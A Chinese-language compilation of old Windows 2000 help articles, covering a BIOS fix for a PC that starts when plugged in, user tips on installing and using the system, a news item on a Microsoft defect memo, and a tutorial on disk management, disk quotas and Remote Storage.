---- 有一个问题一直困扰着我，我的电脑一旦接通电源无需按动开关就会启动。经过验证电脑开关是有效的，我使用的是能源之星电源。请问如何解决这一问题？

---- 您可以按以下步骤检查您的机器的设置。

---- (1)检查BIOS设置，将BIOS中Power Management Setup的Restore AC Power Loss设置为“Disabled”。

---- (2)如果上述方法不奏效，继续在BIOS中将Power Management Setup的PM Control by APM设置为“Yes”。

---- 注意，个别BIOS版本与此不同，请参照具体BIOS说明书。目前发现这类问题比较多，如果上述方法不奏效，部分主板还需要升级BIOS或安装最新的主板芯片补丁包。

返回


使用win2000的一点经验

《一键清理系统垃圾》

使用win2000的一点经验

        一、安装时的注意事项

    先谈谈安装吧，从历史经验看，微软操作系统的头一版，总有这样或那样的问题，俗话说“不怕一万，就怕万一”，Windows2000并没有提供卸载功能，安装之前一定确保现有的重要资料和应用程序有了完整的备份，为自己留好退路。作为纯32位操作系统的Windows2000虽然号称支持PnP(即插即用)，但是据大家反映，对一些老的硬件支持不太好，而且以超级解霸为首的一些日常软件在Windows2000下也运行不起来。所以安装前最好先运行Windows 2000光盘中的i386\winnt32 \checkupgradeonly，检查一下你机器中当前操作系统下所有的硬件和软件是否与Windows2000兼容。如果有问题，赶快去厂商站点下载最新的For Windows2000的驱动程序或补丁。

    在安装2000时，保留一个FAT分区是很重要的，尤其是如果你的系统崩溃，需要重新安装时你就会感觉到这样做的好处。Windows2000可以识别FAT、FAT32、NTFS等多种格式，不过在安装时，还是只能在FAT分区上。它会问你是要保持原来的格式还是转为NTFS,一般我们选为原来的格式，但这时可不要掉以轻心，以为它就老老实实地在FAT上装了。尤其是很多原来的NT4.0用户为了谨慎，要在系统中以双重引导方式，既安装Windows2000，又保留安装Windows NT4.0时。因为Windows2000的文件系统是所谓NTFS5.0，而即使你在安装时选择保持原有格式，2000却仍会悄悄地改变所有NTFS4.0分区到NTFS5.0，其结果就是：NT4.0将无法再使用这些分区了。尤为重要的是这个过程无法逆转，唯一能做的只有重新格式化硬盘并从头安装和配置Windows NT4.0。

    如果你现在用的是试用版的Windows98 OEM2，Windows2000会查出来，并提示你的Windows不是正式版本，不让你进行升级安装。

    个性化的菜单

    进入Windows2000后就可以发现，微软把渐变技术用到了菜单的弹出和缩入中，看起来很养眼。鼠标的指针也有了立体感极强的阴影效果。2000的程序菜单是所谓“个性化”菜单，就是不断地监视经常使用的菜单项目加以显示，隐藏那些不经常使用的程序选项。当你要想使用那些隐藏了的菜单时，只要将鼠标指针停在双箭头上方，菜单中就会显示出所有的应用程序项。显示出的菜单项还会根据程序的使用频率动态调整，最常用的就会在最前面。

    2000“资源管理器”中的工具栏也可以个人化了，缺省的工具按钮只是按普通用户的需要而设置的，你可以根据自己的需要对“资源管理器”中的工具按钮进行定制，选择文件夹窗口中的查看/工具栏/自定义选项，然后在出现的窗口中根据自己的需要添加或删除不常用的工具按钮即可。

    特殊的“我的文档”

    桌面的排列变化不大，新出了一个“我的文档”被放在了最前头。“我的文档”被2000作为所有应用程序保存文件的缺省文件夹。这主要是为了增强对用户文件的管理。当多人共用一台计算机时，“我的文档”为每个用户准备一个，一个用户不会看到另一个用户的文档，用户文件的安全性得到了很好的保护。“我的文档”文件夹中还有“我的图片”文件夹，方便用户预览图片和加强用户对图片的管理，能在不打开其他图像浏览程序的情况下浏览、打印图片，其中可以放大，缩小查看细节，全屏浏览或缩放为实际大小

新增的“任务管理器”

    NT系列中的另一利器——任务管理器也出现在了2000中。在程序菜单中你是找不到它的，需要在任务栏中点鼠标右键，从弹出菜单中选择"任务管理器"选项。2000 SERVER版也可以按Ctrl＋Alt＋Del，然后选择 "任务管理器"选项。任务管理器中有应用程序、进程和性能三项。比较重要的是应用程序项，应用程序一项显示了所有正在运行的应用程序，在Windows 2000中，任何应用程序都无法修改系统内核使用的内存区域，从而可以有效地阻止某些软件运行错误导致操作系统整体崩溃，而且某个程序停止运行并不会影响系统中的其他程序。对于不响应的程序，我们可以用任务管理器/应用程序/结束任务来进行关闭。在这一项中还能切换到要使用的程序，把选中的程序显示到最前端，开始新任务(也就是启动一个新程序)，从程序项转到进程项，查看程序对应的进程。进程一项显示出着当前的进程，包括映像名称、CPU时间、CPU使用率和内存使用率等参数，在这里可以结束一个进程，还能将这个进程所创建的其他进程同时结束，可以设置进程为实时、高、高于标准、标准、低于标准、低六个等级的优先级。2000的用户要想知道自己计算机的性能，如进程数、CPU和内存的使用情况等，不用再安装第三方软件了，在任务管理器的性能一项中应有尽有了，而且还有像示波器那样的动态图形。

    增强的“网上邻居”

    在Windows2000中想修改一些设置，比如想给网卡添加个协议，可是不如过去那样简单，控制面板中的网络选项中只有一些简单的介绍了。查HELP，原来现在可以在“网上邻居”中的“本地连接／属性”中完成。2000的“网上邻居”功能得到了很大的增强，所有基于网络的操作都可以通过“网络邻居”进行修改、删除和添加。原来在Windows 98中要通过“控制面板”中的“网络”组件才能添加的网络协议及服务，在Windows 2000中都可以在“网上邻居”中完成，对于已经存在的网络协议，在添加时将不再显示。而且这些网络选项添加之后，计算机不用重新启动。

    齐全的“控制面板”

    只要是在原来95，98中有，而在2000中找不到的选项，可以先去控制面板中瞅瞅，这里可是多了不少新面孔。打印机和任务计划都被装了进去，还多了扫描仪和照相机选项。对了，微软强力推荐的Internet Infomation Server 5.0 (IIs 5.0)并不在默认安装中，需要在添加/删除程序，添加/删除Windows组件中进行安装。对了，看没看到第一排中多了一个不起眼的"管理工具"。它可不简单，其中包括了"计算机管理"、"事件查看器"、"数据源"、"性能"和"组件服务"五类工具。可以对本地和远端的计算机进行管理。察看应用日志(Application)、安全日志(Secuity)和系统日志(System)，了解系统程序运行的结果，以及登录上网时和Windows系统组件出现的问题，并根据这些结果分析出现错误的原因。还能使用"性能"工具，如在"性能监视器"中添加须要监视的对象(使用"+"号按钮)，察看系统的变化情况，或者通过计数器日志、跟踪日志和警报对本地或远端系统进行监视，并可根据预先的设定进行特定的跟踪和报警。

    更新的“快捷方式"

    从WIN98开始，用户就可以在任务栏左侧的快速启动栏中添加快捷方式了，Windows2000中自然继承了这一点。但要是添的快捷方式太多了，又要用滚动条左右查，仍不方便。这时可以建立一个文件夹，然后右键点击任务栏空白处，选择“工具栏”中的“新建工具栏”，在弹出的对话框中指定你新建的目录，任务栏中就会出现一个新的工具栏，用鼠标右键将其拖至桌面，把桌面上的快捷方式都移动进该工具栏，再用鼠标右键点击新的工具栏，然后选择“自动隐藏”，用的时候只要将鼠标移过去就可以像开始菜单那样显示和选择了。

    Windows2000中，按住CTRL键，用鼠标可以复选任务栏中的几个项目。如果你想一下关掉几个应用程序或窗口，你就可以用这个方法，选中所有项目，再在任务栏上点鼠标右键，选关闭就可以了。

    在Server版的2000中，如果你经常用Ctrl+Alt+Del 然后选择“关闭系统”来关机，那你可以在桌面上创建一个快捷方式，命令行是“rundll32.exe user32.dll,LockWorkStation”。再把快捷方式拖到任务栏中，以后只要一点就可以关机了。

神奇quot;修复控制台"

    在2000的安装光盘或是硬盘的安装目录下运行WINNT32/cmdconsole，重新启动计算机，你就会发现在启动选项中多了一个Repair Console(修复控制台)。试试吧，如果用安全模式和其它启动选项都不能启动计算机，那么就只有用“恢复控制台”了，这可是2000的最新特技，98和NT4.0中都找不到。使用“恢复控制台”可以启动和停止服务、读写本地驱动器上的数据(包括用NTFS格式化的驱动器)、从软盘或CD复制数据、格式化驱动器、修复引导区或主引导记录以及执行其它管理任务。

    文件夹加密

     你在98下用过Folder Guard等文件夹加密软件吗？Windows2000中已经有了这样的加密工具，可以保护文件和文件夹，以防别人偷看。只要在资源管理器中，选中想要加密的文件或文件夹，用单击鼠标右键，选择属性／常规／高级，然后选定“加密内容以保证数据安全”复选框。

    桌面的网络更新

     2000将IE4.0中的频道功能(也就是互联网“推”技术)和Web桌面功能作了很大扩展，可以将互联网上很多内容添加到桌面，可以从Internet上获取图片，添加到桌面；或者在桌面上添加“活动桌面库”中的项目，如股票行情板、滚动新闻、娱乐链接或天气预报信息等。只要在桌面上的空白区域单击鼠标右键，选择活动桌面/新桌面项目，然后按照屏幕上的提示操作即可。

    实用的诊断硬件小工具

    Windows2000中有一个方便的实用程序可以用来诊断某个外设硬件的问题。窃凇翱刂泼姘濉敝械摹疤砑?删除设备”选项，打开后，选择“添加/修复设备”，在 Windows2000完成对新的即插即用设备的查找后，选择想要诊断和修复的设备。

     改进的“磁盘碎片整理"

    2000不止继承了NT的优点，也吸收了98的优点弥补NT的不足。比如对大硬盘来说，磁盘碎片整理是平时用得最多也非常重要的系统工具，NT中却没有。2000的磁盘碎片整理很有特色，可以先得到磁盘中文件的排布情况，然后再决定是否进行磁盘整理，这比以前在Win98中整理磁盘碎片只凭感觉又方便很多。在磁盘整理的同时，还可以将现在的文件排布与整理之前进行对比。利用 Windows2000 的错误检查工具，可以查找硬盘上的文件系统错误和坏扇区。方法是：从“我的电脑”中选择需要检查的本地磁盘，在“文件”菜单中选择属性／工具／错误检查，记住要先选定“磁盘检查选项”下的“扫描并尝试恢复坏扇区”复选框。

    可选的打开方式

    Windows 2000的资源管理器中的鼠标右键菜单中增加了一项可选的打开方式。如果你不想用缺省的关联程序打开某个文档，可以在该文档上单击鼠标右键，然后在出现的右键菜单中选择“打开方式”选项，最后在激活的“打开方式”窗口中选择对应的应用程序即可。这项功能的出现，不仅可让用户清除注册表中文件的打开方式，还能用其他的程序打开没有与之相关联的程序文件，帮助用户选择正确的应用程序来处理不同的文档。

    因为笔者也是Windows2000的初级用户，暂时还只有上述经验和朋友共享，希望能和大家多加交流，像以前的Win95,Win98那样，尽早玩转Windows2000。

返回


视窗2000缺陷知多少

《一键清理系统垃圾》

视窗2000缺陷知多少

    据ZDNET报道，根据Sm@rt Reseller所获得的微软一份内部通报，视窗2000软件中存在数万个设计缺陷。目前该公司的视窗开发小组的最大任务就是排除所有这些程序错误。

    微软视窗开发组领导人Marc Lucovsky在备忘录中写道：“我们的客户不希望我们卖给他们任何有63000个潜在的已知缺陷的产品。他们希望所有设计缺陷都能得到修正。你们当中有多少人愿意花500美元买一个充斥了63000多个设计错误的软件呢？”

    据微软公司的备忘录，视窗2000软件的源代码存在以下问题：

    21000多个“延迟性”设计缺陷，其中相当一部分被微软定性为“真正的隐患”。

    27000多条“BugBug"评语。这是开发员在开发过程中为使软件的某些模块能够更好地发挥功能而记录的备注。在微软看来，这些评语代表着“尚未完成的工作”或“久被遗忘的问题”。

    总体而言，微软的Prefix检查工具一共发现了65000多个“潜在的问题”，这些问题有可能真正影响到视窗2000正常运行。微软预计这些问题当中，有大约28000个会成为“真正的”问题。

    Lucovsky说道：“我们的目标是视窗2000的下一个发行版本必须做零设计缺陷。要达到这个目标，唯一可行的办法是采取一切办法修正错误。”他还说今后视窗软件，如Whistler和Blackcomb，在目前的设计缺陷得到全部修复之前不会增加新的代码。

    微软一女发言人对视窗2000的质量进行了有力的辩护。她说：“在计算机科学中程序设计缺陷是不可避免的。所有市面上发行的软件都有问题。区别在于在微软的开发历史上，从来没有一个软件象视窗2000一样经受过严格得到难以置信的内部和外部检测。”

    她说总共有75万名测试人员对每个测试版本的视窗2000进行过测试。另外“还有数百家公司检验过视窗2000的高质量和可靠性。”她说：在视窗2000正式发布之前已经有数百家企业安装使用了这个程序。

返回


数据存储

《一键清理系统垃圾》

数据存储

    随着 Internet 的迅猛发展，用户数量的不断增长，多媒体数据及基于内容的数据日趋普及，造成了对大型存储空间的需求，同时用户也希望管理一个具有快速存取，灵活增减存储设备的便于管理的网络系统。
本章主要介绍以下内容：
1、磁盘管理
2、磁盘配额管理
3、远程存储管理
4、可移动存储

    9.1 磁盘管理
    磁盘管理程序是用于管理它们所包含的硬磁盘和卷，或者分区的系统实用程序。通过磁盘管理，用户可使用文件系统创建卷、格式化卷、初始化磁盘以及创建容错磁盘系统。"磁盘管理"取代了 Windows NT 4.0 及更早版本中使用的"磁盘管理器"实用程序，它提供了许多新的功能，包括：
§　动态磁盘。使用动态磁盘，用户可在不关闭系统或中断用户操作情况下完成管理任务。例如，用户可在不重新启动的情况下添加新的磁盘。多数配置的更改几乎马上就能生效。
§　本地和网络驱动器管理。可从用户网络上的任何 Windows 2000 计算机上管理任何其他网络上运行 Windows 2000 或 Windows NT 4.0 并且用户是其管理员的计算机。
§　简化的任务和直观的用户界面。
§　装入的驱动器。可使用"磁盘管理"在本地 NTFS 卷上的任何空文件夹中连接或装入本地驱动器。装入驱动器使数据更易访问并根据用户的网络环境和系统使用情况为用户提供管理数据存储的灵活性。

9.1.1 Windows 2000 文件系统
    Windows 2000 支持 NTFS 文件系统、文件分配表 (FAT) 和 FAT32。NTFS 是推荐的 Windows 2000 文件系统。如果用户计划从其他操作系统（包含 MS-DOS）上访问这个卷或分区上的文件，必须将该卷或分区格式化为 FAT。如果用户只运行 Windows 2000 并且想使用 NTFS 功能，请选择 NTFS，因为只有使用NTFS文件系统，才能实现 Windows 2000 种的全部功能。
以下是 NTFS 特有的功能：

文件系统功能
NTFS
FAT
FAT32

压缩
X

磁盘配额
X

加密
X

装入点
X

远程存储
X

9.1.2 基本和动态磁盘
    磁盘管理支持基本和动态 磁盘。安装 Windows 2000 时，用户的硬盘自动初始化为基本磁盘。安装完成后，用户可使用升级向导将它们转换为动态磁盘。可在同一个计算机系统上使用基本和动态磁盘，但在包含多个磁盘的卷（如镜像卷）中，只能使用一种类型的磁盘。
基本磁盘遵守 Windows NT Server 4.0 磁盘组织结构中面向分区的方案。对于升级，分区的磁盘自动初始化为基本磁盘，所以用户可以保持用 Windows NT Server 4.0 创建的分区和卷。新或空磁盘可在安装后初始化为基本或动态磁盘。但是，要安装新的容错磁盘系统，或在不重新启动计算机的情况下更改磁盘，则必须使用动态磁盘。

    只能在基本磁盘上执行以下任务：
§　创建和删除主分区 和扩展分区。
§　创建和删除扩展分区中的逻辑驱动器。
§　格式化分区并将其标记为活动状态。
§　删除卷集、带区集、镜像集和带有奇偶校验的带区集。
§　从镜像集中分割镜像。
§　修复镜像集或带有奇偶校验的带区集。

动态磁盘是一种包含使用"磁盘管理"创建的动态卷的物理磁盘。动态磁盘不包含分区或逻辑驱动器，也不能使用 MS-DOS 访问。

    只能在动态磁盘上执行以下任务：
§　创建和删除简单卷、跨区卷、带区卷、镜像卷和 RAID-5 卷。
§　扩展简单卷或跨区卷。
§　从镜像卷中删除镜像或将该卷分成两个卷。
§　修复镜像卷或 RAID-5 卷。
§　重新激活丢失的磁盘或脱机的磁盘。

    对于基本磁盘和动态磁盘，均可执行的任务：
§　检查磁盘属性，如容量、可用空间和当前状态。
§　查看卷和分区属性，如大小、驱动器号指派、卷标、类型和文件系统。
§　为磁盘卷或分区以及 CD-ROM 设备指派驱动器号。
§　为卷或分区建立磁盘共享和安全设置。
§　将基本磁盘更新为动态磁盘或将动态磁盘转换为基本磁盘。9.1.3 动态磁盘和动态卷的限制
    在便携机上不支持动态磁盘。如果使用便携机，则在"磁盘管理"的图形或列表视图中右键单击磁盘时，不会看到把磁盘升级到动态磁盘的选项。
    对动态磁盘的限制出现在下列情况中：
§　安装 Windows 2000
    如果动态卷是从动态磁盘上的未分配空间创建的，则不能在这个卷上安装 Windows 2000。但是可以扩展该卷（如果该卷是简单卷或跨区卷）。因为 Windows 2000 安装程只能识别包含分区表的动态卷，所以出现安装限制。分区表会出现在基本卷以及从基本卷升级的动态卷中。如果在动态卷上创建新的动态卷，则新的动态卷不包含分区表。§　扩展卷时
    如果磁盘是从基本卷升级为动态卷（通过把基本磁盘升级到动态磁盘），则可以在该卷上安装 Windows 2000，但是不能扩展该卷。因为包含 Windows 2000 文件的引导卷不能是跨区卷的一部分，所以才出现对扩展卷的限制。如果扩展包含分区表的简单卷（即从基本卷升级到动态卷的卷），则 Windows 2000 安装程序能够识别该跨区卷，但是由于引导卷不能是跨区卷的一部分，因此不能将 Windows 2000 安装到该卷上。可以安装 Windows 2000 的动态卷只能是简单卷和镜像卷，而且这些卷必须包含分区表（这意味着这些卷必须从基本卷升级到动态卷）。
    用户可以通过磁盘管理窗口以图形和列表方式显示磁盘和卷。通过更改显示在上下窗格中的内容以及选择用于显示卷和磁盘区域的颜色及图案，用户可以自定义查看磁盘和卷的方式。而且 Windows 2000 还支持连接至远程计算机的磁盘管理。要管理远程计算机上的磁盘，使用客户机的用户必须是远程计算机上的管理员或服务器操作员组的成员。同时，用户帐户和服务器计算机必须是相同的域或信任域中的成员。

9.1.4 磁盘管理控制台
    首先打开"计算机管理" 如图 9.1，单击"磁盘管理"进入磁盘管理控制台 如图 9.2。在磁盘管理控制台的右侧窗格中，分为上、下两个窗口，它们以不同的格式显示磁盘的有关信息。

单击"磁盘管理"进入磁盘管理控制台 如图 9.2。通过"查看"菜单中的"顶端"，"底端"的相应设置，控制显示磁盘的方式：此案列表、卷列表、图像视图。

通过 图 9.3 用户可以了解图形视图中所显示的内容的意义。通过"查看"菜单中的"设置"项，用户可以调整显示颜色和显示比例。

    9.1.5 磁盘管理
§　磁盘存储类型的选择
    在计算机上添加新的磁盘时，用户需要在创建卷或分区之前初始化磁盘。如果用户想在磁盘上创建简单卷或计划与其他磁盘共享磁盘以创建跨区卷、带区卷、镜像卷或 RAID-5 卷，请使用动态存储区。如果用户想在磁盘上创建分区和逻辑驱动器，请使用基本存储区。MS-DOS、Windows 98 和 Windows 95 只能访问基本磁盘。基本存储器是默认创建的。仅动态磁盘上的镜像卷和 RAID 卷具有容错能力。
§　创建分区或逻辑驱动器
    步骤1 打开磁盘管理

步骤2 右键单击基本磁盘的未分配区域，然后单击"创建分区"，或者右键单击扩展分区中的可用空间，然后单击"创建逻辑驱动器"。如图 9.4
    步骤3 在"创建分区向导"中，单击"下一步"，单击"主分区"、"扩展分区"或"逻辑驱动器"，然后按照屏幕上的指示操作。

§　将基本磁盘升级到动态磁盘
    步骤1 打开磁盘管理
    步骤2 右键单击需要升级的基本磁盘，单击"升级到动态磁盘"，然后按照屏幕上的指令操作。如图 9.5
    步骤3 如果没有看到这个命令，可以右键单击卷而不是磁盘，磁盘可能以前升级到动态磁盘，或者该计算机是便携机。（便携机不支持动态磁盘。）

    注意：
  §　必须以管理员或管理组成员的身份登录才能完成该过程。如果计算机与网络连接，则网络策略设置也可能阻止用户完成此步骤。
  §　要打开"磁盘管理"，请单击"开始"，指向"设置"，单击"控制面板"，双击"管理工具"，然后双击"计算机管理"。在控制台树中，双击"存储"，然后单击"磁盘管理"。
  §　有关将基本磁盘升级到动态磁盘的其他信息，请参阅相关主题。
  §　将基本磁盘升级到动态磁盘后，不能将动态卷改回到分区。相反，必须删除磁盘上的所有动态卷，然后使用"还原为基本磁盘"命令。
  §　在升级磁盘之前，关闭在那些磁盘上运行的程序。
  §　为使升级成功，任何要升级的磁盘都必须至少包含 1 MB 的未分配空间。在磁盘上创建分区或卷时，"磁盘管理"将自动保留这个空间，但是带有其他操作系统创建的分区或卷的磁盘上可能没有这个空间。（这个空间即使在"磁盘管理"中看不到也存在。）
  §　一旦升级，动态磁盘就不能包含分区或逻辑驱动器，也不能被 MS-DOS 或 Windows 2000 以外的其他 Windows 操作系统访问。
  §　将基本磁盘升级到动态磁盘时，基本磁盘上已有的全部分区都变为动态磁盘上的简单卷。已有的镜像卷（镜像集）、带区卷（带区集）、RAID-5 卷（具有奇偶校验的带区集）或跨区卷（卷集）分别变成动态镜像卷、动态带区卷、动态 RAID-5 卷或动态跨区卷。

§　将动态磁盘改为基本磁盘
    步骤1 打开磁盘管理
    步骤2 右键单击要改回基本磁盘的动态磁盘，然后单击"还原成基本卷"。
    注意：
  §　必须以管理员或管理组成员的身份登录才能完成该过程。如果计算机与网络连接，则网络策略设置也可能阻止用户完成此步骤。
  §　要打开"磁盘管理"，请单击"开始"，指向"设置"，单击"控制面板"，双击"管理工具"，然后双击"计算机管理"。在控制台树中，双击"存储"，然后单击"磁盘管理"。
  §　在把动态磁盘改回基本磁盘之前，必须从动态磁盘中删除所有卷。
  §　一旦把动态磁盘改回基本磁盘，就只能在该磁盘上创建分区和逻辑驱动器。

  9.2 磁盘配额管理
    9.2.1 基本概念
    在 Windows 2000 种磁盘配额跟踪以及控制磁盘空间的使用，令系统管理员可将 Windows 配置为：
§　用户超过所指定的磁盘空间限额时，阻止进一步使用磁盘空间和记录事件。
§　当用户超过指定的磁盘空间警告级别时记录事件。
    启用磁盘配额时，可以设置两个值：磁盘配额限度和磁盘配额警告级别。该限制指定了允许用户使用的磁盘空间容量。警告级别指定了用户接近其配额限度的值。例如，可以把用户的磁盘配额限度设为 50 MB，并把磁盘配额警告级别设为 45 MB。这种情况下，用户可在卷上存储不超过 50 MB 的文件。如果用户在卷上存储的文件超过 45 MB，则把磁盘配额系统记录为系统事件。可以指定用户能超过其配额限度。如果不想拒绝用户访问卷但想跟踪每个用户的磁盘空间使用情况，启用配额但不限制磁盘空间使用将非常有用。也可指定不管用户超过配额警告级别还是超过配额限度时是否要记录事件。
    启用卷的磁盘配额时，系统从那个值起自动跟踪新用户卷使用。但是，磁盘配额不应用到现有的卷用户上。可以通过在"配额项目"窗口中添加新的配额项目将磁盘空间配额应用到现有的卷用户上。可以在本地卷和网络卷上启用配额，但是只能在从卷的根目录共享以及用 NTFS 文件系统格式化的卷上启用配额。

配额和用户
    由于磁盘配额监视单个用户的卷使用情况，因此每个用户对磁盘空间的利用都不会影响同一卷上的其他用户的磁盘配额。例如，如果用户把 50 兆字节 (MB) 的文件保存到 F 卷上，则那个用户必须从该卷删除或移动一些过时文件，才能把其他数据写到这个卷上。但是，其他用户在那个卷上可继续存储直到 50 MB 空间的文件。
    磁盘配额是以文件所有权为基础的，并且不受卷中用户文件的文件夹位置的限制。例如，如果用户把文件从一个文件夹移到相同卷上的其他文件夹，则卷空间用量不变。但是，如果用户将文件复制到相同卷上的不同文件夹中，则卷空间用量加倍。
    文件夹和磁盘
    磁盘配额只适用于卷，且不受卷的文件夹结构及物理磁盘上的布局的限制。
    如果卷有多个文件夹，则分配给该卷的配额将整个应用于所有文件夹。例如，如果 \\Production\QA 和 \\Production\Public 是 F 卷上的共享文件夹，则用户对这两个文件夹的使用不能超过已指派的 F 卷配额。
    如果单个物理磁盘包含多个卷，并把配额应用到每个卷，则每个卷配额只适于特定的卷。例如，如果用户共享两个不同的卷，分别是 F 卷和 G 卷，则即使这两个卷在相同的物理磁盘上，也分别对这两个卷的配额进行跟踪。

如果一个卷跨越多个物理磁盘，则整个跨区卷使用该卷的同一配额。例如，如果 F 卷有 50 MB 的配额限度，则不管 F 卷是在物理磁盘上还是跨越三个磁盘，都不能把超过 50 MB 的文件保存到 F 卷。
    配额详细信息的更新
    在 NTFS 文件系统中，卷使用信息按用户安全标识 (SID) 存储，而不是按用户帐户名称存储。第一次打开"配额项目"窗口时，磁盘配额必须从网络域控制器或本地用户管理器上获得用户帐户名称，将这些用户帐户名与当前卷用户的 SID 匹配，并组装带有用户名的"名称"列上的项目。从域控制器或本地用户管理器中获得这些名称时，名称将显示在该区域中。第一次查看配额项目时，这个过程立即开始。
获得这些名称之后，名称将保存在卷上的文件中，以便下次打开"配额项目"窗口时可立即使用。但是，因为此文件可能持续几天使用而没有被 Windows 更新，所以"配额项目"窗口可能不反映查看配额项目后对域用户帐户列表所做的更改。
    配额和转换的 NTFS 卷
    因为磁盘配额都是以文件所有权为基础的，所以对影响文件所有权状态的卷做任何更改，包括文件系统转换，都可能影响该卷的磁盘配额。因此，在现有的卷从一个文件系统卷转换到另一文件系统之前，用户应该了解这种转换可能引起所有权的变化。

  因为它们使用存储在 NTFS 文件系统字段的数据来识别文件所有者，所以磁盘配额可以在用于 Windows 2000 的 NTFS 版本和用于 Windows NT 4.0 及更早版本的 NTFS 中工作。但是，由于 FAT 和 FAT32 卷上的文件归该系统所有，因此从 FAT 或 FAT32 转换到 NTFS 的卷上的文件不是根据拥有文件的用户来计算的。在这种情况下，这些文件由管理员帐户负责。因为管理员拥有无限的卷使用权限，因此这几乎不是问题。
    本地和远程实现
    用户可在本地计算机和远程计算机的卷上启用磁盘配额。在本地计算机上，可以使用配额限制登录本地计算机的不同用户可使用的卷空间容量。在远程计算机上，可以使用配额限制远程用户的卷使用情况。
    可使用配额确保：
    登录到相同计算机的多个用户不干涉其他用户的工作能力。
    公用服务器上的磁盘空间不由一个或多个用户独占。
    在个人计算机的共享文件夹中，用户不使用过多的磁盘空间。
    要启用远程计算机卷上的配额，这些卷必须是通过在 Windows 2000 中使用的 NTFS 版本格式化的，并且是从卷的根目录共享的。同样，用户必须是远程计算机卷上的 Administrators 组的成员才能启用和管理配额。

9.2.2 磁盘配额管理
§　启用磁盘配额
    步骤1打开"我的电脑"
    步骤2 右键单击要启用磁盘配额的磁盘卷，然后单击"属性"
    步骤3 在"属性"对话框中，单击配额选项卡，如图9.6
    步骤4 在"配额"属性页上，单击"启用配额管理"复选框，然后单击"确定"。

通过属性项用户还可以执行以下任务
  §　禁用磁盘配额
  §　拒绝超过限制的用户使用磁盘空间
  §　指派默认配额值
  §　查看磁盘配额设置
§　添加新配额项目
    步骤1 打开"我的电脑"
    步骤2 右键单击要添加新磁盘配额项目的卷，然后单击"属性"
    步骤3 在"属性"对话框中，单击配额选项卡

步骤4 在"配额"属性页上，单击"配额项目"
    步骤5 在"配额项目"窗口中，单击"配额"菜单上的"新配额项目"　 如图 9.7
    步骤6 在"选择用户"对话框的"搜索范围"列表框中，选择要从中选择用户名的域或工作组的名称。单击"添加"，然后单击"确定"

步骤7 在"添加新配额项目"对话框中 如图 9.8 ，指定下列选项之一，然后单击"确定"：
  §　不限制磁盘的使用。不限制磁盘空间而跟踪磁盘空间的使用。
  §　将磁盘空间限制在。激活限制磁盘空间以及设置警告级别的字段。在文本字段中键入一个数值，然后从下拉列表中选择磁盘空间限制单位。可使用十进制值（例如，20.5 MB）。输入的值不能超过卷的最大容量。

在"配额项目"窗口中，用户还可以实现以下任务：
§　查看卷用户的磁盘配额信息
§　删除配额项目
§　修改用户磁盘空间限制和警告级别
§　在"配额项目"窗口中查找配额项目
§　排序配额项目
§　更改"配额项目"窗口中的列顺序
§　创建配额报告
§　从其他卷导入配额设置
§　将配额设置导出到其他卷上

9.3 远程存储管理
    "远程存储"使您不需要添加更多硬盘就能轻松扩充服务器计算机的磁盘空间。"远程存储"将本地卷上的合格文件自动复制到磁带库。然后"远程存储"监视本地卷上的可用空间。文件数据缓存在本地，以便需要时可以快速访问。当被管理卷上的可用空间量下降到需要的级别以下时，"远程存储"将自动从缓存文件中删除内容，以提供您需要的磁盘空间。当从文件中删除数据时，文件所使用的磁盘空间将减少到零。直到需要更多的磁盘空间时，才删除缓冲文件中的数据。当需要打开其数据已经被删除的文件时，数据将自动从远程存储中撤回。由于库中的可移动磁带每兆字节 (MB) 的成本开销比硬盘少，所以这是提供最多数据存储量和最佳本地磁盘性能的经济方法。
§　数据存储的级别
    "远程存储"的数据存储具有层次结构，有两个经过定义的等级。上一级，称为本地存储器，包含在 Windows 2000 Server 上运行"远程存储"的计算机上的 NTFS 磁盘卷。下一级，称为远程存储，位于连接到服务器计算机的自动磁带库或独立磁带驱动器上。

"远程存储"支持所有 SCSI 类 4 毫米、8 毫米和 DLT 磁带库。不推荐使用 Exabyte 8200 磁带库的"远程存储"。"远程存储"不支持 QIC 磁带或光盘库。
§　检索存储的文件
    当需要访问"远程存储"所管理的卷上的文件时，只要简单地打开该文件。如果文件数据不再被缓存在本地卷中，"远程存储"将从磁带库中撤回数据。由于这样做要花费比通常更多的时间，"远程存储"将根据您设定的标准，仅从本地卷上最不可能需要的文件中删除数据。
§　与其他工具的配合
    "远程存储"使用"可移动存储"来访问包含在库中的可应用磁带。远程存储还能与 Windows 协作以便进行数据恢复。"远程存储"同时提供某些数据还原特性，包括在远程存储中生成多个副本的能力。

9.3.1 基本概念
    "远程存储"作为 Windows 2000 服务器的服务运行，并使用"可移动存储"来访问在被用于远程存储的库中的可应用磁带。您可以从 Microsoft 管理控制台 (MMC) 管理"远程存储"，使用"远程存储"管理单元执行所有任务。如图 9.9 说明了"远程存储"与服务器计算机之间的关系。

"远程存储"使用 Windows 2000 的安全性来授予或拒绝对存储管理的访问。只有有管理员权限的用户帐户才能管理"远程存储"；但是，有适当权限的用户可以打开"远程存储"所管理的卷中的文件。
    "远程存储"将"远程存储"选项卡添加到 Windows 资源管理器的卷"属性"对话框，以及本地计算机的"磁盘管理"管理单元中。该选项卡显示本地和远程的存储统计信息和设置。在从其他计算机远程管理卷时，"远程存储"选项卡只显示在运行"远程存储"服务的计算机中。
    "远程存储"操作不会影响使用文件大小的程序（如 Disk Quota）。当"远程存储"通过从已经被复制的缓存文件中删除数据来释放磁盘空间时，文件所使用的磁盘空间成为零。但是，文件的逻辑大小和日期/时间（创立、上次修改、上次访问）属性保持不变。
    在使用 Windows 文件管理器 (Winfile.exe) 时，不显示"远程存储"所管理的文件。这将影响运行 Windows 以前版本的客户端计算机。服务器计算机上只能存在一个"远程存储"安装。
    在"远程存储"控制之下的、服务器计算机上的本地磁盘卷被称为被管理卷。例如，可以将 D 盘配置为被管理卷。如果您在其他驱动器中有辅助硬盘，例如 E、F 等，您也可以将其配置为附加的被管理卷。

由"远程存储"管理的磁盘卷必须是不可移动的，同时也必须用 Windows 2000 所使用的 NTFS 版本格式化。"远程存储"按照您指定的计划和规则，自动从被管理卷将数据复制到远程存储。由您配置被管理卷上保留的可用磁盘空间大小，以及用于将特定文件复制到远程存储的标准。如图 9.10 中显示了"远程存储"如何从本地存储将文件复制到远程存储的过程

9.3.2 远程存储管理
§　安装"远程存储"
    步骤1 如果您的计算机中尚未安装"远程存储"，请执行下列步骤：
  §　打开"控制面板"中的添加/删除程序
  §　单击"添加/删除 Windows 组件"。
  §　选中"远程存储"复选框，然后单击"下一步"。
  §　当系统询问您现在是否想重新启动计算机时，请单击"是"。
